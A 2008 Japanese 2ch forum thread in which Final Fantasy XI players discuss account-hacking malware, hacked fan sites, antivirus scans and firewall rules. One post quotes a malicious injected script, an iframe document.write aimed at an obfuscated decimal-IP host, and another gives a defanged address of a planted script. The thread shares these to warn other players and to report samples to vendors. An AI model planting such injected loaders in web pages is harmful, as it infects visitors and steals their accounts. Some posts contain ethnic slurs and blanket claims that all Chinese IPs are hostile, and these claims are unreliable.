69既にその名前は使われています:2008/08/14(木) 00:02:41 ID:aMNS/R4r
垢ハク犯人は装備の売却に常時とんずらやワープツールを使っている。
このようなツールは鯖のツール判定プログラムで自動的にピックアップ
されるから、ハクられた垢はほぼ傷垢(ペナルティポイント加算)になってる。
他人に履かれたフンドシで相撲を取るなんて考えれられん。解約するは・・・
70既にその名前は使われています:2008/08/14(木) 00:29:56 ID:YzENHiPb
他人の履いたブルマだと考えるんだ
71既にその名前は使われています:2008/08/14(木) 00:35:53 ID:A+IAEUkE
男が履いたブルマかYO!
72既にその名前は使われています:2008/08/14(木) 00:39:58 ID:YzENHiPb
そこは妄想でカバーだ!
73既にその名前は使われています:2008/08/14(木) 00:45:15 ID:GeNlfYze
見てきたスクリプト、ここに出したらいけないですよね
見られれば、たとえばチェッカーで見たときスクリプトがわからない人でも
参考にできると思うですけど
74既にその名前は使われています:2008/08/14(木) 00:47:12 ID:JQYbzxaC
参考になるから支障のない範囲でお願い

で、なんか垢ハック犯人らしいが詳しくは不明
http://changi.2ch.net/test/read.cgi/ogame/1218036781/l50#tag103
75既にその名前は使われています:2008/08/14(木) 00:56:24 ID:IOKTBHql
スレ違かもなんですが、カスペとかPG2入れてると、FFXIログインしてる時に
しばらく未入力だとPCがフリーズするとかそういう不具合とかありますかね?
76既にその名前は使われています:2008/08/14(木) 01:00:04 ID:GeNlfYze
では、コアだと思われる部分だけ

罠スクリプト↓
document.write("<iframe src=http:\/\/1039045744:88 width=100 height=0><\/iframe>");
77既にその名前は使われています:2008/08/14(木) 01:00:33 ID:YzENHiPb
>>73
無くてもいいよ。無用な混乱を招く。

>>74
LSでIDとパス教えててパクって鯖移転のそれ飽きた。
78既にその名前は使われています:2008/08/14(木) 01:02:49 ID:YzENHiPb
>>75
別な要因かと。省電力でコケたとか熱暴走とか。
79既にその名前は使われています:2008/08/14(木) 01:04:23 ID:GeNlfYze
>>77
ごめんなさい、ちょっと前後で書いちゃいましたm(_ _)m
80既にその名前は使われています:2008/08/14(木) 01:07:36 ID:IOKTBHql
>>78
うーん、今までそういうの無かったんですけどね〜
キャラ動かしてたり何かしら入力してると何時間でも問題ないんですが、
全く入力してないで放置してると1時間くらいかなぁ でフリーズしてて
PCの電源落とすしかなくなるんですよ。
なんだかなぁ;
81既にその名前は使われています:2008/08/14(木) 01:10:24 ID:vAFpXIit
大丈夫だと思うけどエレメンも当分見れんな
82既にその名前は使われています:2008/08/14(木) 01:11:47 ID:9n56YTji
miku.xrea.jpにアクセスすると
53.139.29.106に接続していますとステータスバーに表示され、
ブラウザが更新され続けるのですが、
これもウィルスに関する挙動でしょうか?
83既にその名前は使われています:2008/08/14(木) 01:23:49 ID:GeNlfYze
>>82
わたしもそれになって自前のソフトとカスペルスキーのオンラインスキャンをして
みましたけど、とりあえずウィルスはいませんでした
まぁ、wreaが危ないといっても、xreaそのものにウィルスがいるわけではないので
気になったらスキャンしてください
あと、FF11Warningさんとこはミラーサイトがありますから、こちらに↓

FF11Warningさんとこのミラーサイト = ttp://www.geocities.jp/ff11warning/
84既にその名前は使われています:2008/08/14(木) 01:28:08 ID:tol5S0KS
>75
ASUSなんかの自作PCなら
温度モニタソフト入れてたら要注意

原因が判明するまで何回フリーズしたやら_| ̄|○
85既にその名前は使われています:2008/08/14(木) 01:29:55 ID:GDhlN80S
垢ハック多いと言うコトでカスペルスキーでオンラインスキャンしたら
P2P-Worm.Win32.spy Bot.gl ってのが見つかったんですが
コレって垢ハックのウィルスですか?PC素人なのでよくわかりません。
ご教授宜しくお願いします
86既にその名前は使われています:2008/08/14(木) 01:30:47 ID:vlbi0W4q
先週末に垢ハックにあい、ウイルス対策をしているのですが
ウイルスバスターの全検索、Kasperskyの重要部分&メモリは特に問題はないのですが
なぜかPC起動時に毎回以下のアクセスログがでます(まとめて6回ほど)
Range:Hong-Kong
Destination:61.238.148.112
Protocol:ICMP
Action:Blocked

ブロックされているのでいいといえばいいのですが、
他にも不正通信されていないか心配です。
ちなみにICMPなのでPINGへの応答かと思いネットワーク切断して
起動してみましたが同じでした。
これはウイルスでしょうか?またよい対策はありますでしょうか?

87既にその名前は使われています:2008/08/14(木) 01:31:47 ID:p8SK/0L4
>>85
FFとは関係ない。クレカの番号とかぱくるやつだな
88既にその名前は使われています:2008/08/14(木) 01:33:27 ID:iIdWbJKU
>>86
まずIPでぐぐれ
それガチでウイルスのあるURLだよ
ブラウザ開く前からそこに繋ごうとしてるならまだどこか感染してるんじゃないかな
89既にその名前は使われています:2008/08/14(木) 01:34:09 ID:EVITxU2z
>>85
もっと怖いやつみたいだな ご愁傷様
90既にその名前は使われています:2008/08/14(木) 01:35:32 ID:cf9VZbXa
>>86
困ったときはクリーンインストールだ
91既にその名前は使われています:2008/08/14(木) 01:37:26 ID:LxIClmK2
>>86
>先週末に垢ハックにあい、ウイルス対策をしているのですが

クリリンしたのかね?どうせしないで見つかったウイルス削ったから安心^^とか思ってるんだろ?
甘すぎますよ奥さん
92既にその名前は使われています:2008/08/14(木) 01:40:42 ID:GDhlN80S
85です。返事ありがとうございました。
もっと怖いヤツだったのですか〜・・・
カスペルスキーで赤字>緑字になって脅威はありませんと出たのですが
コレで安心なのでしょうか?質問ばっかりですみません
ご教授おねがいします。
93既にその名前は使われています:2008/08/14(木) 01:41:12 ID:IOKTBHql
>>84
PCはおんぼろDELLなんですけどね〜
ただHD新しくしてセキュリティ対策したので、グラボのドライバが
古いまんまなんですが、それは関係ありますかね?
94既にその名前は使われています:2008/08/14(木) 01:43:00 ID:LxIClmK2
>>92
アンチウイルスは定義したもの意外のウイルスを基本的に探すことは出来ません。
貴方のPCが安全かは誰にもわかりませんし、誰も安全だとは言わないでしょう
95既にその名前は使われています:2008/08/14(木) 01:43:08 ID:GeNlfYze
http://changi.2ch.net/test/read.cgi/ogame/1218036781/l50#tag103

↑こっちのほうは単にリアルで知り合ったPCのパスを使ってアイテムを取り逃げしただけの
ことらしいですから、業者のアカウントハックとはぜんぜん別問題みたいですね
96既にその名前は使われています:2008/08/14(木) 01:43:47 ID:EVITxU2z
>>92
削除されたならおkだろうけどさ
すぐカード番号かえたほうがいいんじゃねーの?
97既にその名前は使われています:2008/08/14(木) 01:45:28 ID:aiXUw+5I
>>80
カバー外して扇風機吹きかけてゲームしながら様子見てみ?
ケースによっては熱が逃げずにこもりまくって暴走するから。

メーカー製やBTOとかだと特にね。
98既にその名前は使われています:2008/08/14(木) 01:48:40 ID:vlbi0W4q
>>88
IPはモロに危険っぽいですよね。
ブラウザ開く前ですが、スタートアップに少しアプリが入っていたので
それを削除してからもう一回試してみます。

>>90
いろいろPC環境整えてあるのでクリーンインストールは避けたかったのですが、、
とりあえずFF復帰までは1ヶ月近くあるっぽいのでいろいろ検討してみます。

>>91
安心はしてないですがクリリンのことは最終手段としていました。
でも今の不安状態で生活するよりはまっさらにしたほうが良いかもしれませんね。

ご教授ありがとうございました
99既にその名前は使われています:2008/08/14(木) 01:48:49 ID:IOKTBHql
>>97
なるほど。試してみます。
ありがとうです〜
100既にその名前は使われています:2008/08/14(木) 01:50:08 ID:p8SK/0L4
>>85

P2P-Worm.Win32.spy Bot.gl

-- このマルウェアは以下の情報を収集し送る能力があります:
. キャッシュに入ったパスワード
. CPU速度
. ログインしているユーザ
. 空きメモリ
. マルウェアの起動時間
. プラットフォームID
. 起動中のプロセスについての情報
. メモリサイズ
. ウインドウズ・ディレクトリ
. ウインドウズOSについての情報
101既にその名前は使われています:2008/08/14(木) 01:50:33 ID:p8SK/0L4
-- その他以下のアクションを実行することもできます:
. IRCサーバと接続します。
. DDoS SYN flood 攻撃を開始します。
. IRCサーバとの接続を終了します。
. ダウンロード・ファイル
. 実行ファイル
. IRCチャンネルに入室する
. プロセスを強制終了する
. IRCチャンネルを退室する
. リモートシェルを開く
. ネットワーク・スキャンの実行
. ポート転送を実行する
. システム再起動
. キーログの開始          ←キーロガー
. マルウェアを終了する
. プロセスを終了する

http://www.avira.com/jp/threats/section/fulldetails/id_vir/2235/worm_spybot.gl.315.html
102既にその名前は使われています:2008/08/14(木) 01:52:59 ID:H0UdjKQk
P2Pなんてするから・・・
103既にその名前は使われています:2008/08/14(木) 01:56:21 ID:GeNlfYze
書かなくてもいいことかもですけど

Range:Hong-Kong
Destination:61.238.148.112

これ、wrea改竄で飛ばされるところのIPです
104既にその名前は使われています:2008/08/14(木) 01:58:08 ID:H0UdjKQk
香港の警察に中国語で通報してみて
香港なら英語でも通じるか
105103:2008/08/14(木) 01:58:20 ID:GeNlfYze
落ち着け>わたし

wrea ×
xrea ○
106既にその名前は使われています:2008/08/14(木) 01:59:13 ID:1gwjXYqU
>いろいろPC環境整えてあるのでクリーンインストールは避けたかったのですが

…マルウェア発見しても”完治”する気がない、こういう脳天気な人にあれこれ言っても無駄な気がする……
垢抜かれて一度ひどい目にあわないと本気にならないんじゃない?
107既にその名前は使われています:2008/08/14(木) 01:59:13 ID:aklN3wiM
>>60
Final Fantasy XI Web Portalさんのところに仕込まれていたスクリプトのアドレスは、これでした。
www●1ive●net■images■banner.jpg
(●を.に、■を/に変換してください)
ソースチェッカーで見ると、スクリプトが吐かれて来ます。
108既にその名前は使われています:2008/08/14(木) 01:59:21 ID:YzENHiPb
>>103
君はxreaをwreaと打つ性癖を直したほうがいい
109既にその名前は使われています:2008/08/14(木) 02:10:41 ID:YzENHiPb
>>107
XREA改ざんとは別な奴だね。
今いじり中。
110既にその名前は使われています:2008/08/14(木) 02:18:57 ID:YzENHiPb
>>107
検体拾えた。
polcoreの文字列が見えるからたぶんFFのアカハック。
system32\disk.dll
system32\msni.exe
これがあったら感染。
111既にその名前は使われています:2008/08/14(木) 02:43:26 ID:YzENHiPb
NortonとバスターとBitDefender以外はだいたい検知可能。
ttp://www.virustotal.com/analisis/c0526dddbb0826ce02ea524874b9bb90
ソースネクストですらも(駆除できるかどうかは知らない)。
スカった主なベンダには送付済み。
112既にその名前は使われています:2008/08/14(木) 02:48:14 ID:LxIClmK2
検体提出乙

しかし、亜種が半端ない速度で出るな
被害は減りそうに無いな
113既にその名前は使われています:2008/08/14(木) 02:51:46 ID:YzENHiPb
1iveは前からマークしてたのよね。ダウンローダが頻繁に更新されるんで。
XREA食った奴はサイトは1つ(fccja)だけどやる事はすごい。
ただ圧倒的に多いのは、やることはもっとずっとショボいけど
その代わりものすごい数のドメインを取り続ける奴。1iveは後者。
114既にその名前は使われています:2008/08/14(木) 04:11:58 ID:IS46vyYb
ウイルスひっかかったらクリーンインストールは最終手段じゃなくて比較的初期にやる
ものだよ。
115既にその名前は使われています:2008/08/14(木) 04:15:01 ID:jMGq0IPe
どんだけネ実脳だ
さすがFF専用機所持率No.1板だwwwwwwwwwwwwwww
116既にその名前は使われています:2008/08/14(木) 06:53:34 ID:zQGTa+ds
パス抜き祭り下火になってきたんぁもっと盛り上がればいいのにw
117既にその名前は使われています:2008/08/14(木) 06:53:54 ID:WAx7BW0K
>>
最後の砦だよな、一日4万ぐらいアクセスあるんだろ。
へたすりゃサービス終了なりかねん;;
118既にその名前は使われています:2008/08/14(木) 07:09:03 ID:CZdM2WB1
PCをクリーンインストールしたからノートン入れなおしたんだけど、インスコ許容台数超えたから
シマンテックのサポセンに電話してロックを解除して貰ったんだわ。
2回電話して別の受付の人にそれぞれ対応してもらったんだけど2回とも中国人だったんだよねー。
ノートンのウィルス対応が遅いのはまさか内部に・・・まさか・・・な
119既にその名前は使われています:2008/08/14(木) 07:47:16 ID:2oBeZiwE
シマンテックのサポセンは日本語が通じないときがある
マジで
120既にその名前は使われています:2008/08/14(木) 08:55:16 ID:ubcX74yi
日本語通じないだけなら、まあ担当かえさせるとか手はあるんだが、
日本の常識が通じなくてマニュアル的にできませんとか言われると、
取り付く島が無くて困ってしまう。

なので、サポート使いそうなソフトやPC本体なんかは、サポートの良いとこってのが選ぶ第一条件になるなー
電話のつながりやすさも同じくらい重要かな。
自力で問題ないものはどうでもいいけど。
121既にその名前は使われています:2008/08/14(木) 09:01:29 ID:a85ZncdE
さっき手動でwindowsupdateしようとしたらweb上のエラーがどうのこうのって出てできなくて
もっかいやっても同じで
更にやったらできたんだけど
どうやら自動更新の察知と同時にやっちゃったせいでエラーになったようだ、一瞬焦ったw
122既にその名前は使われています:2008/08/14(木) 09:31:51 ID:lFJerQM/
うへ
SPYBOTを1.60にしたら動作が不安定になった
123既にその名前は使われています:2008/08/14(木) 09:36:30 ID:gGZVjC5K
>>82 >>83
miku.xrea.jpは s350というサーバに設置していて
IPはそのサーバのIP53.139.29.106に設定されてます。
xrea.jpは 無料で使えるサブドメインなので〜xrea.jp というサイトのIPはバラバラになります。
参照:ttp://www.value-domain.com/svip.php?action=all#bottom

アクセス許可を ブラウザの言語設定で
日本語がある○
中国語 ロシア語がある×としているので
日本語があって 中国語かロシア語もあるとループしてしまってるかもです すみません。
帰省中のため戻りましたら確認してまた報告させていただきます。
手短ですみません。
124既にその名前は使われています:2008/08/14(木) 09:39:08 ID:/VEQf9Sp
シマンテックのサポートはチャットにしておけ。
コピペとかできるから電話よりは遙かにまし。

しかし、あの会社は返金可能とかを謳い文句にしてるけど、海外取引必須とか理解できない。
自作機と相性悪くて、何故かインストール後3日で起動しなくなる不具合があってどうあっても直らず・・・
そんな動かないもの持っててもしょうがないから返金して貰おうと思ったけど、手続きが面倒すぎて諦めたし。
125既にその名前は使われています:2008/08/14(木) 10:05:02 ID:0ls6wOvV
126既にその名前は使われています:2008/08/14(木) 10:42:09 ID:71MRUmDe
初心者ですみません。
マイクロソフトのアップデートは自動更新が有効になっていたのですが、
先ほどマイクロソフトのHPに行ってみて確認したところ、16個もインストールされていないもの?がありました。
これはこちらのPCの問題なのでしょうかか、ウイルスなのでしょうか
127既にその名前は使われています:2008/08/14(木) 10:45:40 ID:Thw5puhu
昨日、大量にアップデートがあったから。
128既にその名前は使われています:2008/08/14(木) 10:47:15 ID:71MRUmDe
>>127
そうだったんですか!だとしたら今日の自動更新の時間に更新されることになってたのかもしれませんね
ありがとうございました。
129既にその名前は使われています:2008/08/14(木) 10:48:27 ID:Thw5puhu
自動更新は、カスタムインストールの方のアップデートや追加がされないしね。

定期的に手動でアップデートしないとダメ。
130既にその名前は使われています:2008/08/14(木) 10:54:03 ID:kbR5x+m6
>>126
定例だから安心汁
131既にその名前は使われています:2008/08/14(木) 11:33:39 ID:YzENHiPb
>>126
というかそういうのは
http://pc11.2ch.net/pcqa/
132既にその名前は使われています:2008/08/14(木) 12:17:47 ID:HO31Cm+w
すみません、テンプレのFWの設定で悩んでいるので教えてください。
カスペルスキーを使っています。

ファイアウォール、アプリケーションのルール→pol.exeで
1.新しいアプリケーションのルール
 内容はUDPで許可、テンプレのリモートIPアドレスの範囲、リモートポートの範囲を設定
2.新しいアプリケーションのルール
 内容は1と同じだけれどTCP
3.Block Any TCP Activity
  すべてのTPC接続を遮断
4.Block Any UDP Activity
  すべてのUDP接続を遮断

にしています。確か1・2の設定の上に、すべてを遮断にしないといけないとどこかに書いてあった気がしたので
今まで1と2だけにしていたので、3と4を追加したのですが、そうするとPOLに接続できなくなりました、、
優先順位は上から順番とか書いてあった気がするのですが、この設定ではだめなのでしょうか、、、
教えてください。
133既にその名前は使われています:2008/08/14(木) 12:29:33 ID:BdHDMfA1
3と4は不要
134既にその名前は使われています:2008/08/14(木) 12:36:15 ID:cILPiNG6
ここの常連さんのほとんどはPG2を使ってると思うので
ちょっとお尋ねしたいんですが…

PG2を入れてみたところ、毎日24:00前後に必ず1回、FFが
全画面モードを失いましたエラーになって落ちるんです。
2アカ使いなんですがPC2台とも同様の症状が出てます。

PG2の設定にある自動更新の類は全部チェックOFFにしたんですが、
それでも状況は変わらずで、PG2を起動しないようにしたら改善
されたので原因はPG2で間違いないと思うんですが。

ぐぐってみたらこのスレの過去ログ(17,18)あたりで同じような
人がいたらしいんですが、改善策は出てなかったのでとりあえず
書き込ませてもらいました。
どなたか同様の現象がおきてるとか、改善策をご存知の方とか
いらっしゃいませんか?
135既にその名前は使われています:2008/08/14(木) 12:43:00 ID:rNsAdinb
>>134
別のアンチウィルスソフトの自動更新が24:00に走ってるとか?
136既にその名前は使われています:2008/08/14(木) 12:43:57 ID:HO31Cm+w
>>133
やっぱりそうなんですか。ありがとうございます。1と2だけにしときます。
137134:2008/08/14(木) 12:50:16 ID:cILPiNG6
>>135さん
アンチウィルスソフトはavast!を使っています。
一応他の常駐も疑ってみたのですが、明らかな状況として
・PG2を使っていた期間(1週間)は必ず毎日落ちていた
・PG2を使っていない期間(その後1ヶ月ほど)は全く落ちていない
なのでPG2を疑っている次第です…。
138既にその名前は使われています:2008/08/14(木) 12:51:21 ID:ZEZoRNG/
>>132
カスペルさんはよくわかんないんだけど、アプリケーションルールは基本上から下に順に処理されていくのねー。
で、Allowルールの下にAll Denyつっこんでおけばーってのは、
どうせPOLはこれ以外の接続しないわけだからAllowした以外の接続は全部ブロックしちゃっていいよねーってことなのね。
別に無くても、変なところに繋ぎ行こうとした時点でこの接続なあに?って聞いてくるだろうから特段無くても構わないと思うけど、
勢い余って許可したら目もあてらんないし、ログ記述だけしてAll Denyしちゃってたほうが安全だし楽じゃないかねw
139既にその名前は使われています:2008/08/14(木) 12:57:43 ID:S2b09amC
そろそろまたルーターのIPブロックリスト更新しないとか・・・
めんどくせえけどそうも言ってられないし。
FWにJAVA、ActiveXブロック機能があるけど、
そんなもの使ったら問答無用でブロックされちまうからなあ。
シナチクどもめ!
140既にその名前は使われています:2008/08/14(木) 13:05:36 ID:rNsAdinb
>>137
ttp://blog.livedoor.jp/syuta3/archives/52000224.html
この人と同じ様な状況なのかも
141既にその名前は使われています:2008/08/14(木) 13:12:08 ID:BdHDMfA1
一応説明下手だけど補足
All DenyのルールはルーターやPGでホワイトリスト方式にする為のルール
通常1つのルール内に混ぜるような設定はしないと思う。
142既にその名前は使われています:2008/08/14(木) 13:24:15 ID:ic2zcj6r
>>134
PGの通知イベントでアイコンが点滅して落ちてるのでは?
もしそうなら、PGの履歴表示でその時間に何かブロックしてないか見てみて。
143既にその名前は使われています:2008/08/14(木) 13:41:57 ID:1m3xC/bN
自分もAvast!とPG2使ってますが、そんな症状は出ないですけどねえ・・・
144134:2008/08/14(木) 13:53:40 ID:cILPiNG6
やっぱりどの環境でも起きることじゃないんでしょうね…
実際毎日1回エラーになるなら、絶対に、設定の注意事項とかでテンプレに載るでしょうしね。

>>140さん
紹介先見てみました。ログイン前の更新チェックを、
落ちても構わないような日に一度試してみます。

>>142さん
通知はOFFにしてあるのと、確かブロックのログには何もなかったと
記憶しています。次に再現したらログも確認するようにしてみます。
145既にその名前は使われています:2008/08/14(木) 13:57:57 ID:17i0qIa5
PGが222.186.190.14というIPからアクセス受けてるのですが垢ハックですか?助けて!”
146既にその名前は使われています:2008/08/14(木) 13:58:51 ID:dY4BwIiF
>>134さん
アンチウィルスソフトのポップアップとかで
全画面モードが落ちることがあったので、ポップアップしないように設定したら
落ちなくなった経験があります。

0:00にチャットソフト等やPGがログを整理する際に負荷がかかって落ちてる可能性も
147既にその名前は使われています:2008/08/14(木) 14:08:04 ID:OLqMI82O
fc2/xreaはもうだめだな
148既にその名前は使われています:2008/08/14(木) 14:08:13 ID:3p03O0L8
>>145
アクセスを受けているのではなく、あなたのPCが中国IPにアクセスしようと
しているわけですが、単に中国IPを弾いているからといって、それがすぐに
ハックだとは言えません
なにをどうしたら中国IPを弾くようになったのか、その説明がないと
なにもわからないです
149既にその名前は使われています:2008/08/14(木) 14:17:55 ID:Q10CGSHW
中国IPはハック、ウイルスと決めつけでいいよ
150既にその名前は使われています:2008/08/14(木) 14:19:30 ID:S2b09amC
>>145
使い方も何が起きているかもわからないのにPG2なんか入れるな
151既にその名前は使われています:2008/08/14(木) 14:27:27 ID:EnO+gkIF
だからさ、説明書読まない>>145にはこれでいいじゃん。
「窓からPCを投げ捨てろ!」
152既にその名前は使われています:2008/08/14(木) 14:28:59 ID:3rwK/bHo
>>145
それカスペルの自動更新w
前スレにもちょこっとあったw

まあ、これから勉強すればいいやんw
153既にその名前は使われています:2008/08/14(木) 14:31:47 ID:3p03O0L8
PlanetLabでしょうかね〜
PG2自身の更新でも中国IPにアクセスにいくことあるし
154既にその名前は使われています:2008/08/14(木) 14:32:47 ID:LxIClmK2
>>126といい>>145と良いPCで金銭にかかわることしちゃいけないレベルだな

余りにひどすぐる・・・
155既にその名前は使われています:2008/08/14(木) 14:48:06 ID:meMultHp
PC詳しい奴からしたら酷すぎでも、
小学生からじーさんばーさんまで含めると
これが一般的な認識。
156既にその名前は使われています:2008/08/14(木) 14:55:05 ID:O0KEO3tj
ネ実ごときで上から目線はひどいwwwwwwwwwww
157既にその名前は使われています:2008/08/14(木) 15:07:21 ID:P9H0WAMK
もっともっとハックされればいいのに( ^ω^)
158既にその名前は使われています:2008/08/14(木) 15:24:36 ID:BdHDMfA1
気になるアドレスやURLはaguse.jpでチェックってテンプレにもあるんだけど〜
159既にその名前は使われています:2008/08/14(木) 15:35:57 ID:S2b09amC
嫌ならPS2か箱○にすればいいだけのこと
文句を言う前に自力で何とかできないなら窓からPC投げ捨てろ
160既にその名前は使われています:2008/08/14(木) 16:02:08 ID:YEGO7nH6
>>145

まぁカスペの自動更新の中国のサーバです。

ググればすぐわかりましたよっと。
161既にその名前は使われています:2008/08/14(木) 16:02:53 ID:pKoEMTwb
まあテンプレ嫁ってことで>>1とだけ返してやろうぜw
162既にその名前は使われています:2008/08/14(木) 17:37:36 ID:zQGTa+ds
またギルの販売レートさがってるねwまたバブル到来か?www
163既にその名前は使われています:2008/08/14(木) 17:40:37 ID:+FsTr1Wx
Trojan-GameThief.Win32.WOW.bkf ってハックウィルスですよね?
Program Files\Trend Micro\Virus Buster 2006\Quarantine\F.tmp
が感染してました。
164既にその名前は使われています:2008/08/14(木) 17:42:05 ID:QVTR9/G5
>>162
マジッスか?今の内に買い込んでバブル来たら売り払うか・・・
てか垢ハック被害者で泣き寝入りしちゃったのが大量に出てきたのかもね。

それか垢ハック→巻き戻し→垢売りで在庫増えて業者の嬉しい悲鳴、とか?
165既にその名前は使われています:2008/08/14(木) 17:43:01 ID:Tpki0tts
>>163
なんでサポートの終わってるウイルスバスター2006を未だに使ってるの?
166既にその名前は使われています:2008/08/14(木) 17:47:09 ID:3p03O0L8
>>165
まだ2年ですけど、トレンドマイクロってそんなにすぐ
サポート打ち切っちゃうんですか?
167既にその名前は使われています:2008/08/14(木) 17:49:33 ID:sX02ZuUp
2年もすりゃ打ち切るわ

さっさと最新版のバスター2008に変えなさい
168既にその名前は使われています:2008/08/14(木) 17:49:53 ID:sX02ZuUp
あ 言い忘れたけど無料だからね
169既にその名前は使われています:2008/08/14(木) 17:50:00 ID:n25JogCQ
こりゃたまげた
170既にその名前は使われています:2008/08/14(木) 17:55:53 ID:Tpki0tts
( ゚д゚)ポカーン
http://jp.trendmicro.com/jp/support/personal/end_support/

っていうかちゃんと毎年ウイルスバスタークラブ会員契約更新してるよね?
171既にその名前は使われています:2008/08/14(木) 18:02:47 ID:gRSV5OnP
ログインパスワードを暗号化しないで送るスクエニってやっぱり馬鹿なの?
172既にその名前は使われています:2008/08/14(木) 18:09:47 ID:pKoEMTwb
釣り針が付いて無いですよ?
173既にその名前は使われています:2008/08/14(木) 18:29:53 ID:AGhB/7H2
fc2とxreaが使ってるip分かる人いる?
完全に弾いてしまいたい
174既にその名前は使われています:2008/08/14(木) 18:46:31 ID:ndDls7Fp
>>166
ウィルスバスターは最新版と1つ前以外はサポート対象外だけど
更新料金さえ払ってればソフトのVUP自体は無料
175既にその名前は使われています:2008/08/14(木) 18:47:51 ID:qL6C+BGT
カスペのおじさん、今までは完全スキャンする時にレベルを高にしただけでやってたんだが、
今日ヒューリスティックアナライザの設定で「拡張ルートキットスキャン」にチェック入れて
完全スキャンしたら復元ポイントに残ってたTrojan-GameThief.Win32.WOW.bkfが出てきた

Web専用機だったから良かったようなものの・・・
176既にその名前は使われています:2008/08/14(木) 18:49:37 ID:LxIClmK2
Quarantineには誰も突っ込まないのか
177既にその名前は使われています:2008/08/14(木) 19:14:45 ID:W2qRgPSX
FF11MAPサイトを該当日に踏んでしまったので、OS入れなおししよーかと思って
今バックアップとか、色々準備してる最中なんですが、マクロ作り直すのが毎回
すっごく面倒で、、、FF11のuserフォルダ内をクリーンインスコしたPCに入れるのは危ないですかね?
178既にその名前は使われています:2008/08/14(木) 19:18:16 ID:meMultHp
マクロってサーバー側に保存できるようになったんじゃなかったっけ?
勘違いならごめんなさい。
179既にその名前は使われています:2008/08/14(木) 19:18:39 ID:rNsAdinb
>177
サーバ保存マジおすすめ
http://wiki.ffo.jp/html/3363.html
180既にその名前は使われています:2008/08/14(木) 19:36:36 ID:W2qRgPSX
あれ、なんか軽く調べたら、OS入れなおしたらサーバー保存が消えるとかって
感じで捕らえてたんですが、勘違いかorz

ならマクロに関してはそっちで検討してみます。
181既にその名前は使われています:2008/08/14(木) 19:45:40 ID:BdHDMfA1
アルタナ導入直前VUにてサーバー保存可能になったが
若干失敗する例が報告されている。
USERフォルダのみコピーでもいいかも
もちろんウイルスチェックは必要
182既にその名前は使われています:2008/08/14(木) 19:48:01 ID:qL6C+BGT
検体をカスペルさんに見てもらうときにDLしてきたZipファイルの中身だった、お恥ずかしい
183既にその名前は使われています:2008/08/14(木) 20:12:49 ID:vAFpXIit
XREAの件はお盆休みが終わるまで直る見込みがなさそう?
184既にその名前は使われています:2008/08/14(木) 20:19:52 ID:S2b09amC
>>183
なにをもって直ると思ってる?
前回から短期間でルート取られてるだろみたいな状況で
185既にその名前は使われています:2008/08/14(木) 20:49:02 ID:xxznc/dA
>>173
737 名前:(○口○*)さん[sage] 投稿日:08/08/12 23:47 ID:eVhkSLDc0
a. [JPNICハンドル] KH5915JP
g. [Organization] DIGIROCK,INC.
[最終更新] 2007/02/22 03:20:06(JST)
[email protected]
[参照] NET/59.139.29.96/27
[参照] NET/59.139.29.224/27
[参照] NET/60.32.200.64/27
[参照] NET/60.32.201.96/27
[参照] NET/125.53.24.64/27
[参照] NET/125.53.24.128/27
[参照] NET/125.53.25.0/27
[参照] NET/125.53.25.32/27
[参照] NET/125.53.25.224/27
[参照] NET/125.53.26.0/27
[参照] NET/202.229.187.24/30
[参照] NET/210.153.88.112/30
[参照] NET/210.172.108.224/27
186既にその名前は使われています:2008/08/14(木) 20:49:37 ID:xxznc/dA
[参照] NET/210.196.169.192/27
[参照] NET/210.196.173.48/28
[参照] NET/210.196.176.176/28
[参照] NET/210.251.253.224/27
[参照] NET/218.216.67.32/27
[参照] NET/219.101.229.128/26
[参照] NET/219.163.5.176/28
[参照] NET/219.163.200.64/26
[参照] NET/221.186.251.64/26
[参照] NET/222.227.75.0/27
[参照] NET/222.227.75.32/27
[参照] NET/222.227.75.96/27
[参照] NET/222.227.75.128/27
187既にその名前は使われています:2008/08/14(木) 20:57:57 ID:ZFyQRSJk
【国際】米国:高学歴高収入の人ほど検索エンジンを良く使う…米シンクタンク調査
http://mamono.2ch.net/test/read.cgi/newsplus/1218459871/

自分で調べるってのは習慣化されてるんかねー
>>126>>145とあたりをみてるといろいろ考えさせられるな
188既にその名前は使われています:2008/08/14(木) 20:59:11 ID:xxznc/dA
>Search ARIN WHOIS for: ! NET-64-125-250-0-1
CustName: FC2.com
Address: 818 W. 7th Street
City: Los Angeles
StateProv: CA
PostalCode: 90044
Country: US
RegDate: 2004-01-26
Updated: 2004-01-26

NetRange: 64.125.250.0 - 64.125.251.255
CIDR: 64.125.250.0/23
NetName: MFN-T349-64-125-250-0-23
NetHandle: NET-64-125-250-0-1
Parent: NET-64-124-0-0-1
NetType: Reassigned
Comment: abuse issues to [email protected]
RegDate: 2004-01-26
Updated: 2004-01-26
189既にその名前は使われています:2008/08/14(木) 21:10:27 ID:ghTLqZUH
先月ハック被害に遭い
垢ハック後にクリーンインストールしてから
PG2/avast!/flashplayer最新/winアップデート最新まで持っていって
それでも心配になりカスペルスキーのオンラインスキャンをかけて見たのですが
重要なエリア/マイコンピュータ等をスキャンすると ロックされてスキャン出来ないエリアが出るのですが
これってどうにかいい方法ありますでしょうか・・・?

飛ばしていてもいい領域ならばいいのですが、見れないと意味がないのであれば
オンラインスキャンの意味がないのかな〜・・と思いまして。
何方かご教示いただけると助かります。

ちなみに現在はavast カスペともに何も検出されておりません。
190既にその名前は使われています:2008/08/14(木) 21:15:51 ID:iIdWbJKU
>>189
そりゃ使用中のファイルだから仕方が無い
ロックが極力かかってない状態でスキャンしたいっていうなら、製品版か体験版で
常駐アプリも極力切った状態とかでスキャンするしかないよ。
191既にその名前は使われています:2008/08/14(木) 21:18:57 ID:jVM/XjPc
>>162
RMTやってた連中のまわりでも垢ハックではじめて常連が敬遠しはじめたんじゃねーか?
影響あるない関係なく危ないかもしれないとか考えるしな。

垢売りの市場もしぶってきてるみたいだし
192既にその名前は使われています:2008/08/14(木) 21:23:16 ID:ghTLqZUH
>>190さんありがとうございます。
ここの皆さんもカスペでスキャンした!っていうのは
ロック状態なのかな〜と思って若干気になっていました。

体験版をDLしてavastをいっぺんアンインストールして見ます!
アドバイスどうもでした!
193既にその名前は使われています:2008/08/14(木) 21:43:22 ID:REdBSRMf
POLで突然マウスがきかなくなってキーボード操作しか受け付けなくなったんだけど
何なのこれ
194既にその名前は使われています:2008/08/14(木) 22:14:50 ID:BdHDMfA1
でっていう
195既にその名前は使われています:2008/08/14(木) 22:22:51 ID:meMultHp
>>193
たぶんマウスがこわれた。
196既にその名前は使われています:2008/08/14(木) 22:25:22 ID:/cBBvjv1
実は右手が動いてないという落ちはないよなw
197既にその名前は使われています:2008/08/14(木) 22:27:09 ID:B86L0cAt
動いているけど場所が違(以下自粛
